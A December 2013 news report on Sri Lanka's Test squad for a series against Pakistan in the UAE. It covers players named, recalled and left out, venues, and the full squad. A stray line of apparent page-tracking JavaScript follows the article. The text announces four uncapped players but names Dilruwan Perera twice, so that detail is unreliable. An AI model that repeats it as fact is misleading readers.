Published On: Tue, Dec 24th, 2013
Published in Category: Cricket / Islamabad

Uncapped quartet in Sri Lanka Test squad

Share This

Islamabad: The uncapped Dilruwan Perera, Sachitra Senanayake, Vishwa Fernando and Dilruwan Perera have been named in Sri Lanka’s squad for next month’s Test series against Pakistan in the United Arab Emirates.

Wicketkeeper-batsman Prasanna Jayewardene, batsman Kaushal Silva, fast bowler Nuwan Pradeep and former captain Mahela Jayewardene, who did not feature in March’s two Tests against Bangladesh, have been recalled.

Spinners Ajantha Mendis and Tharindu Kaushal, batsmen Kusal Perera and Kithuruwan Vithanage and all-rounder Jeevan Mendis were overlooked, while seamer Chanaka Welegedara has been sidelined by an ankle injury. The veteran Tillekeratne Dilshan, meanwhile, has retired from Test cricket.

Senanayake has enjoyed a solid stretch of form in limited-overs cricket recently, while fast bowler Fernando has largely been selected on potential. All-rounder Perera will bolster the spin department, too.

The first match of the three-fixture affair will get underway at the Sheikh Zayed Stadium in Abu Dhabi on 31 December. The Dubai International Cricket Stadium and Sharjah Cricket Stadium will hosts matches two and three respectively.

Squad: Angelo Mathews (captain), Dinesh Chandimal, Kumar Sangakkara, Mahela Jayewardene, Kaushal Silva, Dimuth Karunaratne, Lahiru Thirimanne, Prasanna Jayewardene, Nuwan Kulasekara, Suranga Lakmal, Shaminda Eranga, Nuwan Pradeep, Sachithra Senanayake, Rangana Herath, Dilruwan Perera, Vishwa Fernando.
s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;